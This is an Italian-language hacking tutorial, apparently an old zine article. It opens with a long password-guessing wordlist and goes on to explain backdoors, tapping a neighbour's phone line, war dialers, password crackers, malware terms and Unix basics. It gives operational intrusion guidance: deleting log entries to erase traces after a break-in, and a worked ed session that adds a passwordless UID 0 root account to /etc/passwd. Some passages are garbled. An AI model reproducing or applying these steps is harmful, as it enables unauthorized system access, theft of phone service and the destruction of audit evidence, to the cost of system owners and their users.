azure 
bacchus 


badass 
bailey 
banana 
bananas 
bandit 
banks 
barber 
baritone 
bass 
bassoon 
bastard 
batman 
beater 
beatles 
beauty 
beaver 
beethoven 
bella 
bellissima 
beloved 
benz 
beowulf 
berkley 
Berkeley 
berlin 
berliner 
beryl 
beta 
beverly 
bicameral 
bisessuali 
bisex 
black 
blacklotus 
blu 

blue 

bob 
boston 
brenda 
brian 
bridget 
broadway 
brown 
bumbling 
burgess 
caffe 
caffè 
camel 
campanile 
cantor 
cardinal 
cardinale 
carmen 
carolina 
caroline 
cascades 
castle 
cat 
cayuga 
cazzo 
cazzone 


cd 
celtics 
cert 
cerulean 
change 
charles 
charlie 
charming 
charon 
chester 
cigar 
classic 
clusters 
cocaina 
cocaine 
coffee 
coke 
collins 
comrade 
comrades 
computer 
comrade 
condo 
condom 
cookie 
cooper 
cornelius 
COUSCiOUS 
cracker 
crackers 
create 
creation 
creator 
creosote 
cretin 
cyan 
daemon 
dancer 
daniel 
daniels 
danny 
dark 
dave 

deb 
debbie 
deborah 
december 
defoe 
deluge 
desperate 
develop 
diet 
dieter 
digital 
digitale 
discovery 
disney 
dog 
dragon 
dragone 
drought 


duncan 
dylan 
eager 
easier 
easy 
eatme 
ecco 
eccomi 
edges 
edinburgh 
edwin 
edwina 
egghead 
eiderdown 
eileen 
einstein 
elephant 
elizabeth 
ellen 
elsewhere 
emerald 
engine 
engineer 
enterprise 
enzyme 
eretiny 
ersatz 
establish 
estate 
etere 
etereo 
etero 
euclid 
evelyn 
exadecimal 
extension 
fairway 
felicia 
fender 
fermat 
fibre 
fidelity 
figa 
finite 
firenze 
fishers 
flakes 
float 
flower 
flowers 
foolproof 
football 
foresight 
format 
forsythe 
fourier 
fred 
friend 
frighten 
frocio 
fuck 


fufi 

fun 
fungible 
gabriel 
gardner 
gardener 
garfield 
gauss 
gay 
george 
gertrude 
giants 
gibson 
giga 
ginger 
glacier 
gnu 

golf 
golfer 
gorgeous 
gorges 
gosling 
gouge 
graham 
green 
gryphon 
guerra 
guest 
guitar 
gumption 
gunsnroses 
guntis 
hack 
hacker 
hackers 
hamlet 
handily 
happening 
hard 
hardrock 
harmony 
harold 
harvey 
hashish 
heavy 
heavymetal 
hebrides 
heinlein 
hello 
help 
herbert 
hiawatha 
hibernia 
hiv 
hollywood 
holmes 
honey 
horse 
horus 
hutchins 
imbroglio 


imperial 
include 
ingres 
inna 
innocuous 
inside 
id 

ip 
irishman 
ironmaiden 
isis 
italia 
jack 
jackdaniels 
japan 
jessica 
jester 
jets 

jfk 
jixian 
yngwie 
johnny 
joker 
joseph 
joshua 
judith 
juggle 
julia 
juventus 
kathleen 
kbyte 
kbites 
kennedy 
kermit 
kernel 
kernel32 
kevin 
king 
kirk 
kirkland 
knight 
krypto 
kryptonite 
kult 
kurt 
ladie 
ladle 
lambda 
lamination 
larkin 
larry 
lawrence 
lazarus 
lebesgue 
led 

lee 
leland 
leroy 
lewis 
light 
linux 


lisa 
list 
lista 
lists 
listato 
lorenzo 
louis 
love 

low 
lower 
lowered 
lynne 
mac 
macintosh 
mack 
mage 
maggot 
magic 
magica 
magiche 
mago 
magù 
maiden 
malcolm 
malmsteen 
marco 
marlboro 
mark 
markus 
marty 
marvel 
marvin 
master 
maurice 
mega 
megabyte 
megabytes 
mel 

mela 
mellon 
merlin 
metal 
metallica 
met s 
michael 
michelle 
mike 
milan 
milano 
minimum 
minsky 
mit 
modena 
mogul 
moose 
morley 
mozart 
nancy 
napoleon 
nasa 
nesc 


nepenthe 
ness 
network 
newton 
next 

none 
noxious 
nutrition 
nygiants 
nyjets 
nyquist 
ocean 
oceano 
oceanography 
ocelot 
olivetti 
olivia 
omosessuale 
open 
oracle 
orca 
orwell 
osiris 
outlaw 
oxford 
pacific 
painless 
pakistan 
pam 

paper 
papers 
parma 
pascoli 
passwd 
password 
passwords 
pat 
patricia 
penguin 
peoria 
percolate 
persimmon 
persona 
pete 
peter 
phiber 
phiberoptick 
philip 
phoenix 
phreak 
pierre 
pinkfloyd 
pirata 
pizza 
plover 
plugh 
plymouth 
polynomial 
pondering 
pork 
poster 


praetorian 
praise 
precious 
prelude 
prince 
princeton 
protect 
protocol 
protocollo 
protozoa 
pumpkin 
puneet 
puppet 
Purdue 
purdue 
rabbit 
rachmaninoff 
rainbow 
raindrop 
raleigh 
random 
rascal 
read 
reading 
reagan 
really 
rebecca 
red 
redder 
remote 
repubblica 
republic 
rick 
ripple 
robot 
robotics 
rochester 
rolex 
rollingstone 
roma 
romano 
ronald 
rosebud 
rosemary 
roses 
router 
rsa 

ruben 
rules 
ruth 

sal 

satan 
satana 
saxon 
scamper 
scheme 
scott 
scotty 
secret 
send 
sender 


sending 
sensor 
serenity 
sex 
sexpistols 
shark 
sharks 
sharon 
sheffield 
sheldon 
sherlock 
shit 
shiva 
shivers 
shuttle 
sid 
sidvicious 
signature 
simon 
simona 
simple 
singer 
single 
sirio 
smile 
smiles 
smooch 
smother 
snatch 
snoopy 
soap 
socrates 
sorriso 
sossina 
sparrows 
spit 
spring 
springer 
squires 
sri 

star 
starwar 
starwars 
stilskin 
strangle 
strangolare 
stratford 
stregone 
strozzapreti 
stuttgart 
subway 
SUCCess 
summer 


super 
superman 
superstage 
support 
supported 
surfer 
suzanne 
swearer 
symmetry 
tangerine 
tape 
target 
tarragon 
taylor 

tcp 

tcp-ip 
tcp/ip 
tcpip 
telephone 
temptation 
thailand 
TheNic 
thenic 
tiger 
toggle 
tohack 
tomato 
topography 
tortoise 
toyota 
trails 
train 
trains 
transfer 
transfering 
trasferiment 
O 

trash 
trivial 
trofei 
trofeo 
trombone 
tron 
trophy 
trophies 
trustno1 
TrustNo1 
trustnoone 
TrustNoOne 
tubas 
tuttle 

u2 

umesh 


unhappy 
unicorn 


unix 
unknow 
urchin 
utility 
Uunet 
vasant 
veleno 
venezia 
venom 
vertigo 
vicious 
vicky 
village 
virginia 
vittoria 
war 
warcraft 
warcraft2 
warren 
water 
weenie 
whatnot 
whiting 
whitney 
will 
william 
williamsburg 
willie 
winston 
wisconsin 
wizard 
wombat 
woodwind 
wormwood 
XYZZy 
vyaco 
vacov 
yang 

year 
years 
yellowstone 
yosemite 
zap 
zimmerman 
ZOrro 
zupperman 
Z 

ZZ 

ZZZ 


Ci sono nel mezzo anche parole italiane che mi ha passato un mio 
conoscente e che dice siano maggiormente usate...mi voglio fidare... :- 


)) 
3) BACKDOORS 


Le backdoors sono quelle password che il programmatore del sistema 
mette per avere accesso in futuro a quel dato computer e che solamente 
lui conosce. 

Per cercare di individuare la password bisogna fare lunghe ricerca 
sulla persona che ha impostato tutto il sistema: che squadra tifa, 
quali sono i suoi hobby, i suoi idoli, il nome dei vari componenti 
della famiglia, le date di nascita, queste ultime al contrario o 
mischiate tra loro, ecc. 

Tanto per capirci se avete visto il film "wargames", il protagonista 
passa intere giornate a studiare vita morte e miracoli del 
programmatore del sistema oppure anche nel più recente film "hackers" i 
due protagonisti cercano addirittura gli appunti gettati via nella 
spazzatura pur di trovare una password o qualcosa che li possa aiutare. 
Sicuramente questo è il sistema più difficile ma credo che dopo una 
lunga ricerca sia anche il più sicuro poichè poche persone ( cioe' 
quelle furbe ) inseriscono come password qualcosa che non gli è 
famigliare. 

In genere tutti gli user che si connettono ad internet usano nomi che 
riescono a ricordarsi facilmente tipo una data di nascita, il nome 
della ragazza o del giocatore preferito o anche qualcosa di meno 
evidente ma sempre e comunque legato a loro e che difficilmente 
potrebbero scordarsi. 

Del resto romperebbe abbastanza le palle dovere cambiare la propria 
password perchè ce la siamo scordata no? 


Ci sono altri sistemi per penetrare in un computer ma sono molto più 
complessi di questo anche se magari più efficaci. 

Due tra i tanti sono l'IP SPOOFING e successivamente a questo 
l'Hijacking. 

Ne parlerò più avanti. 


Ora, se volete essere veramente paranoici ( meglio esserlo che 
fregarsene ) e avete paura ad hackerare dalla vostra linea di casa ( 
comprensibile per chi non l'ha mai fatto ), potreste, se avete le 
opportunità e i mezzi, collegarvi ad una cabina telefonica tramite un 
computer portatile oppure collegare il vostro computer alla linea 
telefonica del vicino di casa. 

Nel primo caso purtroppo esistono pochissimi documenti ( per non dire 
nessuno ) sul phreaking ( cioè l'atto di telefonare gratis beffando le 
compagnie telefoniche ) in Italia e poichè il sistema telefonico 
italiano funziona diversamente da quello americano ( anche se devo dire 
che non ho mai approfondito veramente l'arte del phreaking ) poche 
possono essere le conclusioni. 

Se non sapete come trafficare con le cabine telefoniche vi consiglio di 
provare a fare un collegamento tra i modem di tipo vecchio, cioe' 
quelli in cui si doveva appoggiare la cornetta sull'apparecchio, e uno 
di tipo nuovo; questa e' solo una mia teoria e sto raccogliendo 
informazioni in questi giorni. 

Nel secondo caso, si farebbe certo prima che studiare il mezzo di 
connettersi ad una cabina telefonica però c'è da dire che il vicino di 
casa potrebbe scoprire dalla bolletta telefonica che qualcosa non 
và...State SEMPRE attenti a quel che fate. 

Comunque anche in questo secondo caso vi serve un portatile: 

Prendete i cavi che escono dal modem e tagliate via la parte di 
plastica alle estremità, trovate vicino alla casa della vittima la 
scatolina dove vanno a finire i cavi telefonici uscendo dalla casa ed 
apritela. 

Dopo che vi siete procurati un paio di alligator clips ( i cavi che 
hanno il beccuccio in fondo a forma di bocca di coccodrillo ) collegate 


il cavo rosso del vostro modem a quello rosso del clip e quello verde a 
quello verde. 

Poi connettete i cavi in questione con quelli rossi e verdi che escono 
dalla cassetta e il gioco dovrebbe essere fatto...controllate che vi 
dia la linea e siete ok! 


PROGRAMMI UTILI 


Ci sono dei programmi che si rendono indispensabili in questo campo: 

Il primo è il ToneLoc oppure l'A-Dial o qualsiasi altro war dialer. Poi 
oltre agli scompattatori sono utili anche i seguenti programmi: 

Il SATAN ( o SANTA ) è un programma che gira sotto macchine Unix e sue 
emulazioni e richiede perl15.0, un browser ( netscape và bene ), 32 MB 
di ram; questo programma consente l'analisi di reti e sottoreti di un 
sistema per trovare falle e aperture. E' stato progettato per poter 
trovare ingressi non controllati nei sistemi ed eventualmente 
chiuderli. E' stato usato ( oltre a questo nobile scopo ) da un certo 
signore chiamato Kevin Mitnick il quale ha fregato programmi segreti 
del governo, una cosa tipo 20.000 numero di carte di credito e chi più 
ne ha più ne metta. 

Un altro programma simile al SATAN è l'ISS che lo precede come data di 
uscita su internet. L'Internet Security Scanner funziona in modo simile 
al SATAN ma non sò dire che requisiti voglia per girare. 

Se vi siete accorti che qualcosa nel vostro sistema non và potete usare 
due programmi per vedere se il SATAN o altri netscanners ( esaminatori 
di reti ) vi hanno fatto una "visitina". 

Uno è il GABRIEL, l'altro il COURTNEY che sono due strumenti che 
riescono a capire se si è stati sottoposti all'attacco del SATAN. 

Un altro programma indispensabile è il crack jack ( o crackerjack ) 
oppure il Brute. 

Questi due programmi comparano le password di una lista, che voi avrete 
compilato prima in un file di testo, con quelle del passwd file 
cercando di trovarne una uguale per poter così usufruirne al momento 
del login. 

Attenzione perchè possono solo decifrare le password criptate col 
metodo DES, NON quelle shadowed. 

Una cosa: chi ha detto in giro che ha decriptato il passwd file 
racconta solo un mucchio di balle perchè non è possibile decriptarlo. 
Al massimo si può, utilizzando i programmi sopra citati comparare una 
lista di password e trovarne una ( o più se si è MOLTO fortunati ) 
giusta. 

Altri programmi utili possono essere il pgp ( Pretty Good Privacy ) e 
il pgpcrack. 

Il primo serve per criptare dei messaggi in modo che nessuno ( tranne 
il ricevente con la giusta chiave ) possa capire. Questo programma ha, 
diciamo, fatto un pò di confusione su internet poichè riusciva a 
criptare i messaggi con una sicurezza quasi totale e i militari ( 
soprattutto americani ) non erano un gran che contenti di questa cosa. 
Il secondo programma, pgpcrack, serve per l'opposto: crakkare i 
messaggi criptati col il pgp ( vedi sotto ). Anche qua bisogna 
comparare una lista di password con il file pgp a meno che non si 
conosca un pò di assembler il che ti potrebbe permettere ad esempio di 
scrivere al posto della lista di password la parola Random e ciò ( dopo 
aver appositamente modificato il programma ) ti permetterebbe di fare 
una scansione di tutti i caratteri ascii. 

Ho sentito dire che il pgpcrak non servirebbe a nulla...io non ho 
sperimentato di persona i risultati e non posso confermare o smentire 
tale voce. Lascio a chi si intende di più di chiavi criptate il compito 
di dare una risposta a tutti quelli che la cercano. 


Apro una piccola parentesi su tre parole che forse avrete sentito dire 
in giro su internet: 

Virus, Trojan Horse, Worm che tradotti sarebbero virus, cavallo di 
troia e verme. 


VIRUS 


Questo è un programma indipendente che riesce a riprodursi. Può 
attaccare gli altri programmi e può creare copie di se stesso. Può 
danneggiare o corrompere i dati su di un computer o calare le 
performance del vostro computer utilizzando risorse come la memoria 
oppure lo spazio libero sul disco fisso. 

Alcuni virus scanner ( anti-virus ) individuano alcuni virus. NESSUN 
anti-virus individua tutti i virus conosciuti e non ti può proteggere 
quindi da essi. 

Avevo letto da qualche parte una frase che era abbastanza significatica 
sia in questo caso che nel caso dell'hacking: 

"...ricorda, le forze dell'ordine fanno passi avanti nella sicurezza 
dei sistemi, scoprono nuovi mezzi per bloccare i nostri attacchi e 
scoprono nuovi trucchi per scovarci ed arrestarci. 

Il loro unico problema è che la tecnologia non si espande solo per 
loro..." 


TROJAN HORSE ovvero IL CAVALLO DI TROIA 


Chi non sa cos'è il cavallo di Troia? 

Spero che pochi non sappiano cos'è. 

Comunque era quell'inganno che dei gran cattivi ragazzi avevano usato 
per portare morte all'inteno di una città nella quale sembrava 
impossibile entrare. 

Un TROJAN ( abbrevio il nome ) da computer è molto simile. 

E' un programma che, con funzioni non autorizzate, si nasconde dentro 
un programma autorizzato. Un trojan ha diverse funzioni...ad esempio 
può mandarti tutte le password che vengono digitate in un giorno al tuo 
indirizzo di posta elettronica e contemporaneamente può cancellarsi da 
solo. 

Se non è intenzionale ( ovvero non viene immesso nel sistema da un 
hacker ) questo viene chiamato bug ( cito una storia che mi ha detto un 
mio amico, RaggedRobin..."per chi non sapesse perchè viene usato il 
termine bug per indicare un errore in un sistema, deve sapere che 
quando avevano inventato il primo computer, che era grande come una 
stanza, tra i suoi circuiti un giorno si infilò una cimice che lo mandò 
fuori uso e da allora i difetti di un sistema vengono chiamati bug cioè 
insetto..." ). 

Alcuni anti-virus individuano alcuni trojan ma come nel caso dei virus, 
nessuno può sentirsi al sicuro poichè per ogni nuova scoperta in campo 
di protezione ne viene fatta una nel campo dell'attacco. 

Per maggiori dettagli sui cavalli di troia vi rimando al primo numero 
di "SystemDown" nel quale ne parla RaggedRobin nel suo articolo. 


WORM cioè VERME 


I worms ( i vermi ) sono programmi simili ai virus che si riproducono e 
si copiano di file in file e di sistema in sistema usando le risorse di 
quest'ultimo e talvolta rallentandolo. La differenza dai virus è che 
mentre loro usano i file per duplicarsi, i vermi usano i networks. 
Nota: sono stati creati, credo e non vorrei dire una balla, da un certo 
Robert Morris Jr. 


ERRORI: 


Quando inserisci un account non valido oppure una password non valida ( 
oppure entrambi ) tu dovresti vedere un messaggio di errore. 

In genere è qualcosa di simile a: Login Incorrect. 

Quando il computer ti dice questo, significa che hai sbagliato una 
delle due cose ma ( per ovvie ragioni ) non ti dice qual'è. 

Quando tu sbagli il login, la chiamata viene registrata in appositi 
file ( error log ) che registrano chi è l'utente e da dove sta 
chiamando per puro scopo di sicurezza. 

Altri tipici errori sono: "Cannot change to home directory" oppure 
"Cannot change directory". Questo significa che la home directory ( la 
directory dell'account in cui ti sei inserito ) è la root directory per 
quell'account. 

Tanto per capirci è come ritrovarsi sul dos in c:\ e sai che indietro 
non puoi andare perchè non c'è nulla, l'unica differenza è che sullo 
unix non ci sono c:\ oppure a:\ quando parti con il sistema ma 
/homedirectory. 

Piccola nota: nello unix è usato questo simbolo per delimitare le 
directory / e non \. 

Molti sistemi dopo che ti hanno dato questo messaggio ti sconnettono 
automaticamente ma altri ti dicono semplicemente che ti hanno messo 
nella root directory ( / ). 

Un altro errore è "No Shell". Significa che nessuna shell ( programma 
di interfaccia con il kernel del sistema che esegue tutti i comandi ) è 
stata impostata per quell'account. Per maggiori dettagli vedi oltre. 
Come sopra, alcuni sistemi ti sconnettono dopo questo messaggio, mentre 
altri ti dicono di usare una shell regolare dicendo "Using the bourne 
shell" oppure "Using Sh". 


ACCOUNT IN GENERALE 


Il sistema unix ha due livelli di sicurezza: potere assoluto e user 
regolare. 

Quelli che hanno potere assoluto sono i root, i system operator, gli 
amministratori di sistema in altre parole. 

Lo unix è impostato ( per i livelli di sicurezza ) su numeri: associa 
un numero con un account; alcuni account possono avere lo stesso 
numero. 

Il numero che definisce i poteri di un root ( amministratore di sistema 
) è 0. Qualsiasi altro account abbia un UID ( User ID ) di 0, ha i 
privilegi di un root. 

Tenete in considerazione che il livello normale di uno user è 100. 


SHELL 


La shell è un programma eseguibile che si "associa" ad un utente quando 
si inserisce ( normalmente o irregolarmente ) in un sistema. 

Questa shell può essere qualsiasi programma eseguibile definito nel 
passwd file. Ogni login ha una shell unica. Le shell sono interpreti 
dei nostri comandi e cioè provvedono a fare da tramite tra noi e il 
sistema vero e proprio. Tanto per capirci le shell sono qualcosa di 
simile al "command.com" del dos. 

Alcuni esempi di shell sono: 

-sh: Questa e la "bourne shell" e si potrebbe definire il "command.com" 
dello unix. 

-csh: Questa è la "C" shell e ti permette di inserire comandi simili al 
uo” a 

-ksh: Korn Shell. Un altro interprete di comandi. 

-tcsh: Permette l'editing dei comandi. E' usata al MIT. 

-vsh: Visual Shell. Questa è come il windows per il dos cioè un 
interprete grafico dei comandi. 

-rsh: Restricted Shell o Remote Shell. Spiegato dopo. 


Quando ti inserisci in un sistema la shell ti dà un simbolo e da questo 
puoi capire a che livello ti sei infiltrato ( spero l'abbiate capito 
prima di questo simbolo! ). 

$: In genere il dollaro è il simbolo che si associa all'user regolare 
senza alcun potere. 

#: Questo invece si associa in genere ai root. 


CARATTERI SPECIALI: 


Control-D: Fine di un file. Quando usi la mail oppure un editori di 
testi, questo comando capisce quando sei arrivato alla fine. Se sei 
nella shell ( nel prompt dei comandi normale ) e premi control-d tu ti 
disinserisci dal sistema. 


Control-J: Su alcuni sistemi questo è come premere "invio". 

@: Questo qualche volta è "null" che tradotto significa "nullo, 
qualcosa di nullo". 

?: Può rappresentare una lettera ( come * nel dos ). Ad esempio se tu 
inserisci qualcosa tipo b?b, lo unix capisce che può essere bob, bib, 
bub ed ogni altra lettera e numero da 0-9 e a-z. 

*: Questo rappresenta ogni numero di caratteri ed è simile a quello 
sopra descritto. Se inseriamo infatti quacosa tipo Hi* può voler dire 
Hit, Him e qualsiasi cosa parta per Hi. Se invece si inserisce H*1 
rappresenta qualsiasi cosa parte per H e finisce per 1. 

[ ]: Specificano un campo. Se diciamo b[o,u,i]b lo unix capisce bob, 
bub, bib. Se gli dico b[a-d] lo unix pensa a qualsiasi lettera compresa 
nel campo ( cioè in questo caso da a fino a d 

In qualsiasi caso lo unix è molto "SENSIBILE" e quindi inserire D al 
post che d non significherà la stessa cosa. 

Occhio quindi ad inserire le password giuste. ;-) 


COMANDI DA USARE SOTTO LO UNIX: 


ls: Questo elenca il contenuto delle directory ( è uguale a dir nel dos 


). 


cat: Questo comando stampa a video il contenuto di un file. Può essere 
usato sui file di testo. 


cd: Cambia la directory come nel dos tranne per il fatto che per 
tornare indietro di una directory non bisogna fare cd.. ma cd .. ( cioè 
separare di uno spazio il cd dai puntini ). Per il resto è uguale al 
dos. 

cp: Copia un file. Sintassi "cp dalfile alfile" 

mv: Questo rinomina un file. Sintassi "mv vecchionome nuovonome". 


pwd: Dà il nome della directory in cui ti trovi. 


rm: Cancella un file. Sintassi "rm nomefile" oppure "rm -r 
nomedirectory". 


write: Manda una chat ad un altro user. Sintassi "write nomeuser"; per 
uscire dal programma write digitare control-d. 


who [w, who, whodo]: Dicono chi è online cioè chi è collegato alla 
macchina sulla quale fai who. Se al fianco del nome dello user c'è un + 
significa che puoi usare il comando write su di lui. 


man: Ti stampa a video l'aiuto sui comandi che vuoi. Sintassi "man 
nomedelcomando"; ad esempio "man who". Questo comando deve essere 
seguito dal comando che si vuole consultare. Ad esempio man -k ricerca 
i comandi che hanno a che fare con la keyword. 


stty: Setta le caratteristiche del tuo terminale. 
sz, rz: Manda e Riceve ( send o receive ) con lo zmodem 
rx, sx: Manda e Riceve con lo xmodem, 


rb, sb: Manda e Riceve via batch ymodem. Questi 6 programmi possono e 
non possono esserci su di uno unix. 


umodem: Manda e riceve con lo umodem. Esempio di trasmissione: 
$ sz nomefile 
ready to send... 
$ rz nomefile 
please send your file.... 
. TC... 


ed: Editor di testi. Sintassi: "ed nomefile". Alcune versioni ti 
possono dare un prompt tipo "*" altre non lo fanno. Il piu' comune, 
comunque, e' il "vi". 


mesg: Cambia il permesso o no di ricevere chat da altri utenti ( il + 
spiegato sopra nel comando write ). 


cc: Il compilatore C. 


chmod: Cambia i diritti di un file. Sintassi:"chmod mode nomefile". Ad 
esempio chmod a+r newtext: Tutti possono leggere newtext perchè a=all 
r=read. Questo è comunque spiegato oltre. 


chown: Cambia il possessore e il gruppo di un file. Sintassi "chown 
possessore (owner) nomefile". 


chgrp: Cambia il gruppo ( spiegato dopo ) di un file. Sintassi "chgrp 
group file" 


finger: Stampa a video le informazioni basiche su un account. Sintassi: 
"finger nomeuser". 


grep: Cerca un qualcosa dentro un file. Sintassi "grep pattern file". 


mail: Questa è una utility molto interessante e utile. Al contrario del 
nome esistono molte versioni della Mail come ad esempio ELM, MUSH e 
MSH. Il programma basico della mail è comunque chiamato "mail". 
La sintassi e: 

"mail nomeuser@indirizzo" oppure 

"mail nomeuser" oppure 

"mail" oppure 

"mail addr1!addr2!addr3!user" 
comando "mail nomeuser@indirizzo" è usato per mandare una mail a 
qulcun'altro su di un altro sistema che solitamente è un altro unix ma 
anche dos e vax possono ricevere posta dallo unix. 
Quando usi "mail nomeuser@indirizzo" il sistema dove sei DEVE avere uno 
"smart mailer" ( conosciuto come smail ) e deve avere quello che noi 
chiamiamo sistem maps. Lo smart mailer così può trovare l'indirizzo e 
mandare così la mail. 


Per le macchine locali basta che digiti "mail nomeuser" dove nomeuser è 
il login a cui vuoi mandare la mail. 

Scrivi il tuo messaggio poi premi control-d. 

Per leggere le TUE mail digita "mail". 

Ad esempio: 


$ mail 


From. MCKrak csi ini 
TOGINE ele n 


Arghhh! 
? 


Il ? è un prompt che aspetta un comando: 

- delete ( cancella ) 

nomeuser - manda allo user 

fname - salva il messaggio con intestazione nel file 

- quit / update mail 

- quit ma non cambia nulla 

nomeuser - mail allo user 

- reply 

invio ] - leggi il prossimo messaggio 

- vai avanti di un messaggio 

- : torna indietro di un messaggio 

h - stampa a video le intestazioni dei messaggi che sono nella tua 
mailbox. 

Ci sono altri comandi e per vederlo basta digitare ?. 

Se mandate fakemail ( false mail ) date un'occhiata anche al file 
/var/adm/maillog 


+0 13 XxXQZ 2 


ps: Process. Questo comando permette di vedere tutti i processi che 
occupano la memoria ( come ad esempio i programmi aperti ). Ogni volta 
che lanci un programma tu assegni un Process ID number ( PID ) per 
scopi di registrazione e tramite ps puoi andare a vedere cosa e' stato 
lanciato. 

Solitamente la prima voce del comando ps è la shell con il tuo nome. 
pf -f dà una lunga lista di processi. 


kill: "Uccide" un processo. Questo è usato per terminare un programma 
nella memoria del computer. Si possono solo uccidere i processi che si 
possiedono a meno che tu non sia un root o il EUID è lo stesso di 
quello che vuoi terminare ( spiegato dopo ). Se "uccidi" la tua shell, 
tu sei espulso fuori dal sistema. 


shwomount (/usr/bin di solito ): serve per mostrare quali parti del 
file-system una macchina esporta sulla rete, e se seguito dall'opzione 
-e visualizza inoltre chi ha la possibilita' di montare tramite nfs la 
partizione esportata ( Se compare la scritta "everyone" siamo a posto 


a 


rusers: consente di sapere quali utenti sono collegati su macchine 
remote connesse alla tua. 


HACKING 


Il primo passo consiste nell'infiltrarsi in un sistema operativo 
trovando un valido account/password. L'obiettivo dell'hacking è 


solitamente quello di guadagnare i pieni privilegi ( root ) sul sistema 
hackerato. 

Piccola nota: 

Quando in un sistema si vedono scritte tipo: drwxr-xr-- Infected ( ad 
esempio ) significa questo: 

la prima lettera "d" significa che quella riga è una directory e ne 
contiene forse delle altre; poi seguono una serie di simboli ( rwx ) 
che stanno per r=read=leggere w=write=scrivere x=execute=zeseguire. 

Sono ripetuti tre volte perchè i primi tre si riferiscono al possessore 
del file; nell'esempio sopra di Infected, potevo sia leggerlo che 
modificarlo che eseguirlo. La seconda serie di lettere si riferisce al 
gruppo a cui Infected appartiene e cioè se quelli appartenenti allo 
stesso gruppo possono o no leggere, modificare o eseguire il dato file. 
L'ultima serie di lettere si riferisce ad ogni altro user che non sia 
Infected e non faccia parte di quel dato gruppo. 

Quelle lettere possono essere cambiate con il comando chown ( spiegato 
sopra ) ma lo può fare solo l'operatore di sistema e solo colui che ha 
creato il file a meno che questo file non sia modificabile dalla terza 
categoria. 

Se per caso ti dovesse capitare di trovare nel passwd file ( 
localizzato in /etc/passwd ) un account privo di password ( cioè c'è 
dello spazio bianco dove ci dovrebbe essere la password ) significa che 
puoi inserire il nome dell'account e se ti chiede la password battere 
invio e così dovresti essere automaticamente dentro. 


UNA VOLTA DENTRO??? SPECIALI FILE... 


/etc/passwd: Questo è il più importante file su di uno unix poichè 
contiene le password e gli account validi per poter entrare nel 
sistema. Il formato per il passwd file è questo: 

nomeuser :password:UserID:GroupIb:descrizione( o vero nome 
):homedir:shell 

Ci sono due esempi da fare: 

infectedm:89fGc%/A&a, Ty:100:100:InfectedMachine:/usr/infectedm:/bin/sh 
demo: :101:100:Test Account:/usr/demo:/usr/sh 

Prendiamo in considerazione il primo esempio: 

Il primo campo dove c'è scritto infectedm si riferisce al fatto che 
infectedm è uno user valido. Il secondo campo dovrebbe contenere la 
password ma è criptata con il metodo di criptazione DES. 

Potresti anche trovare qualche carattere tipo * al posto della password 
e se lo trovi ( cosa praticamente ormai certa nei sistemi odierni ) 
significa che la password è shadowed ( ombrata ) cioè è nascosta e 
solamente il root può andare a vedere l'originale. 

Per combattare quest'ultima "minaccia" si può usare un programma 
chiamato ypcat ( vedi sotto )che gira sui sistemi operativi Sunos. 
Parentesi: 

Le password shadowed sono presenti in due casi: 

Il sistema e' stato reso sicuro ( trusted ) 

Sono installate le YellowPage e in questo caso si puo' utilizzare il 
comando ypcat. 

Prendiamo ora come esempio il secondo che avevamo fatto sopra: qua 
possiamo notare che l'account è privo di password e quindi inserendo ( 
come detto sopra ) il nome dell'account ( in quel caso era demo ) e 
premendo invio si potrà accedere al sistema senza bisogno di inserire 
la password. 


/etc/group: Questo file contiene i gruppi validi. La sintassi 
solitamente è: 

nomegruppo:password:groupid:users nel gruppo. Se vedi uno spazio bianco 
dove dovrebbe stare la password, puoi diventare parte del gruppo usando 
l'utility "newgrp". Comunque ci sono alcuni casi in cui a solo certi 


users è permesso usare il comando "newgrp" per poter accedere al 
gruppo. 

A questo proposito voglio specificare che se l'ultima riga cioè "users 
nel gruppo" è bianca significa che tutti possono inserirsi; al 
contrario se c'è scritto qualcosa significa che solo quello user o 
quegli users possono usare il comando e inserirsi. 

Apro una piccola parentesi sul comando "newgrp": questo è un comando 
che può cambiare la tua attuale group id in una che tu specifichi. La 
sintassi è "newgrp nomegruppo". 


/etc/hosts: Questo file contiene la lista degli host che sono connessi 
attraverso un hardware network ( tipo un x.25 link ) o, qualche volta 

anche quelli connessi attraverso UUCP. Questo è un ottimo file quando 

vuoi hackerare un grande network e infatti ti dice in che sistemi puoi 
usare la rshell ( remote shell ) oppure rlogin e il telnet o qualsiasi 
altro ethernet/x.25 program. 


/usr/adm/sulog ( oppure su_log ): Il file sulog può essere trovato in 
molte directory ma solitamente è in questa. Questo file è ciò che dice 
la parola stessa, un log file per il programma SU. Infatti questo 
registra ogni user ( e ogni suo dato compreso da dove chiama ) che 
usufruisce del programma SU. 

Se devi usare questo programma per entrare nel sistema cerca questo 
file e prova ad editarlo cancellando così le tue tracce. 


/usr/adm/loginlog 

/usr/adm/acct/loginlog: Questo è un log file ( per non dire IL log file 
) e registra le tracce di ogni persona che si inserisce all'interno del 
sistema. E' un file di sicurezza per verificare le persone che hanno 
usufruito del sistema. 

A volte non esiste neppure sul sistema. 


/usr/adm/errlog: Questo è un error log. Può essere ovunque sul sistema. 
Questo registra le tracce di ogni chiamata errata grave e non. Di 
solito contiene un codice che classifica le entrate sbagliate. 

Và da 1a 10. 

Quando si hackera un computer in genere questo file lo classifica con 
il numero 6; il numero 10 è il system crash. 

Dopo che sei penetrato in un sistema cancella le tue tracce anche su 
questo file. 


/usr/adm/culog: Questo file contiene le informazioni su chi ha usato il 
programma CU, da dove ha chiamato, chi era, ecc. 
Un altro file per la sicurezza del sistema. 


/usr/mail/<userLogin>: Questo è dove il programma mail registra le 
lettere di un utente. Per leggere una particolare mailbox devi essere 
quello user, uno user nel gruppo "mail" o un root. Ogni mailbox ha un 
nome. Se si trova questo file leggere bene i nomi scritti qua perchè 
possono benissimo essere gli account degli users. 


/etc/shadow: Il file di cui parlavo prima cioè il file shadowed dove ci 
sono le password ombrate. 


/var/adm/maillog: registra la partenza e la destinazione ( credo ) 
delle mail. 


IL BIN ACCOUNT 


In genere il bin account è solo a livello user ma benchè sia solamente 
a questo livello, è molto forte. 


Questo è potrebbe essere il possessore di molti dei più importanti file 
del sistema compreso /etc/passwd. 

Se hai letto la sezione precedente sulla possessione o no dei file ( 
quelle tre lettere rwx ) puoi capire che se questo account possiede il 
file /etc/passwd essendo un account a livello user ti permette di 
editare il mitico file e di crearti una root entry per te stesso. 

Puoi farlo tramite il comando ed. 

Ad esempio: 


$ ed passwd 
10999 [ la grandezza del passwd varia ] 
* a 


infectedm::0:0: Infected Machine:/:/bin/sh 

( control-d ) 

* W 

* q 

$ 

Ora tu puoi usare il comando Login per reinserirti nel sistema, usare 
il nome infectedm ed essere un root. Facile no? 


Addizionare Account 


